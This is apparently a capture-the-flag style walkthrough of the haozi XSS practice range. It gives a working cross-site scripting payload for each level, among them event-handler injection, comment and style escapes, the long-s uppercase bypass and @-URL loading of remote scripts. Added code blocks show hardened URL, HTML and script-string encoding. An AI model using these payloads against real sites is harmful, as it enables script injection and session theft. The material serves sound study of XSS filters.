XSS online shooting range---haozi
2022-08-03 21:11:00 【hug kitten】
Online shooting range
0x00
This level has no restrictions; <script>alert(1)</script> passes it directly.

0x01
This level puts our input inside a <textarea> tag, and JS code cannot execute inside <textarea>. There are no other restrictions on symbols, so we first close the <textarea> tag and then write the JS code:
</textarea><script>alert(1)</script>
PS: HTML has automatic error correction, so whether or not a <textarea> is added to pair with the trailing closing tag, this code executes.

0x02
This level puts our input into the value attribute, so we need to close the double quote first and then execute the JS code:
aa" onclick="alert(1)

0x03
This level restricts (, ), [ and ]. We can use backticks instead of parentheses to execute the JS code; the double quote of value has to be closed before the JS code that is executed:
aa" <script>alert`1`</script>

0x04
This level restricts (, ), [, ] and `. With backticks unavailable as well, we try to get around it by encoding the parentheses:
aa" <img src=1 onerror=alert(1)

0x05
This level puts the input into a comment and filters the comment-closing characters in the input, so use the second way of closing a comment: --!>
aa" --!> <img src=1 onerror=alert(1)
It can be bypassed without encoding.

0x06
This level filters the JS click events; execute the function by wrapping onto a new line (a line break is required after onerror):
aa" type="image" src=1 onerror
=alert(1)

0x07
This level filters tags such as script, and special symbols like angle brackets are filtered too. HTML is a loose language and completes incorrect syntax. Omitting the closing tag alone does not work; the angle brackets must not form a pair, so we use an <img tag without its closing bracket:
<img src=1 onerror=alert(1)
A newline is required at the end.

0x08
The input is placed inside a <style> tag, and content inside <style> is not executed as JS. Close <style> with the help of a line break; the line break also bypasses the regular expression. Be sure to break the line while the tag is still unclosed:
</style
><img src=1 onerror=alert(1)

0x09
The regular expression requires the input to begin with http. The preceding tag can be closed, the bypass goes in the middle, and // comments out what follows.
http://www.segmentfault.com"></script><script>alert(1)//

0x0A
URL format: the website before the @ can be redirected to the website after it. So we can first create a JS script and then redirect the site to the JS script we wrote ourselves:
http://[email protected]/test.js
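
Added example (not from the original post or the range's source): why a "starts with the trusted site" test like the one in 0x09 and 0x0A does not pin the host, next to a check that parses the URL and compares the host to an allow-list. The allowed host, the attacker.example URLs and all function names are assumptions.

```javascript
// Assumed weak check: the value only has to start with the trusted site.
const TRUSTED_PREFIX = 'http://www.segmentfault.com';
function weakCheck(url) {
  return url.startsWith(TRUSTED_PREFIX);
}

// Hardened check: parse first, then compare the parsed host to an allow-list.
const ALLOWED_HOSTS = new Set(['www.segmentfault.com']);
function strictCheck(url) {
  let u;
  try {
    u = new URL(url);
  } catch {
    return false; // not a parseable absolute URL
  }
  if (u.protocol !== 'http:' && u.protocol !== 'https:') return false;
  if (u.username !== '' || u.password !== '') return false; // reject userinfo before @
  return ALLOWED_HOSTS.has(u.hostname);
}

// Host the browser would actually contact for this URL.
function effectiveHost(url) {
  return new URL(url).hostname;
}

// Constructed sample inputs (attacker.example is a placeholder host).
const SAMPLES = [
  'http://www.segmentfault.com/static/app.js',
  'http://www.segmentfault.com@attacker.example/test.js',
  'http://www.segmentfault.com.attacker.example/test.js',
];

function report() {
  return SAMPLES.map((url) => ({
    url,
    host: effectiveHost(url),
    weak: weakCheck(url),
    strict: strictCheck(url),
  }));
}

console.log(report());
```

Passing the host check does not make the value safe to drop into an attribute; it still has to be encoded for the context it is written into.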

0x0B
The toUpperCase() method converts a string to uppercase, and this level converts our input to uppercase.
Use <img src=1 onerror=entity encoding> or <svg/onload=entity encoding> to bypass it:
<img src=1 onerror=alert(1)>
<svg/onload=alert(1)>


0x0C
The input is case-converted and script is filtered. It can be bypassed with <svg/onload=entity encoding> or <details open ontoggle=entity encoding>:
<svg/onload=alert(1)>
<details open ontoggle=alert(1)>

0x0D
This level filters the characters in /[</"']/ and puts the input into a comment. We first need to escape the comment with a line break; after writing the popup function, another line break is needed so that the symbols that follow can be commented out.
# a line break first
alert(1)
--> # comments out the trailing single quote and parenthesis

0x0E
This level restricts letters that follow an opening angle bracket and uppercases letters. In this case we can use the special character ſ, which is converted to S when uppercased, to bypass it:
<ſvg/onload=alert(1)>
<ſcript src="http://127.0.0.1/test.js"></ſcript> # bypass by including our own JS file
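
Added example (not from the original post or the range's source): the filter described above looks for ASCII letters before uppercasing, so ſ passes the check and only becomes S afterwards; the hardened version transforms first and encodes for HTML last. The weak filter is an assumed reconstruction from the description, and all function names are hypothetical.

```javascript
// Assumed reconstruction of the level's filter: neutralise "<letter", then uppercase.
function weakRender(input) {
  const filtered = input.replace(/<([a-zA-Z])/g, '<_$1');
  return '<h1>' + filtered.toUpperCase() + '</h1>';
}

// Hardened: apply every transformation first, encode for the HTML text context last.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}
function safeRender(input) {
  return '<h1>' + escapeHtml(input.toUpperCase()) + '</h1>';
}

// Audit helper: non-ASCII BMP characters whose uppercase form is made of ASCII
// letters only, i.e. inputs that a "filter, then toUpperCase()" pipeline lets through.
function asciiCaseCollisions() {
  const hits = [];
  for (let cp = 0x80; cp <= 0xffff; cp++) {
    if (cp >= 0xd800 && cp <= 0xdfff) continue; // skip lone surrogates
    const ch = String.fromCharCode(cp);
    const up = ch.toUpperCase();
    if (/^[A-Z]+$/.test(up)) hits.push([ch, up]);
  }
  return hits;
}

// The page's own 0x0E input, used here as the test case.
const SAMPLE = '<\u017fvg/onload=alert(1)>';
console.log(weakRender('<svg>'));   // ordinary tag is neutralised
console.log(weakRender(SAMPLE));    // tag is created by the uppercase step
console.log(safeRender(SAMPLE));    // rendered as text
console.log(asciiCaseCollisions());
```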


0x0F
This level escapes many symbols, but they can still be directly identified, so such encoding restrictions have little effect. We only need to close the preceding part, pop the alert, and comment out the characters that follow.
bbb');alert(1)//

0x10
window.data is a global variable, so writing alert directly is equivalent to passing alert into window.data.

0x11
Very similar to level 0x0F: close the front directly and just comment out what comes after it.
aa");alert(1)//

0x12
This level is similar to level 0x11, but the double quotes are replaced with \\, so we need to add a \ to escape:
aa\");alert(1)//
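
Added example (not from the original post or the range's source): the quote-only escaping described for 0x11 and 0x12, next to an encoder for a JS string inside an inline script, with a small harness that shows whether the input stays inside the string. The weak encoder is an assumed reconstruction from the description; log, run and the other names are hypothetical.

```javascript
// Assumed weak encoder: escapes double quotes but leaves backslashes alone.
function weakScript(input) {
  return 'log("' + input.replace(/"/g, '\\"') + '")';
}

// Hardened: JSON.stringify escapes both \ and ", then the characters that
// matter to the HTML parser around an inline <script> are hex-escaped.
function safeScript(input) {
  const literal = JSON.stringify(input)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026');
  return 'log(' + literal + ')';
}

// Harness: run the generated statement with stub functions and report what
// was logged and whether anything other than log() was reached.
function run(code) {
  const result = { logged: [], escaped: false, error: null };
  const log = (v) => result.logged.push(v);
  const alert = () => { result.escaped = true; };
  try {
    new Function('log', 'alert', code)(log, alert);
  } catch (e) {
    result.error = e.name;
  }
  return result;
}

// The page's own 0x12 input, used here as the test case.
const SAMPLE_INPUT = 'aa\\");alert(1)//';
console.log(weakScript(SAMPLE_INPUT), run(weakScript(SAMPLE_INPUT)));
console.log(safeScript(SAMPLE_INPUT), run(safeScript(SAMPLE_INPUT)));
```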

https://xss.haozi.me/
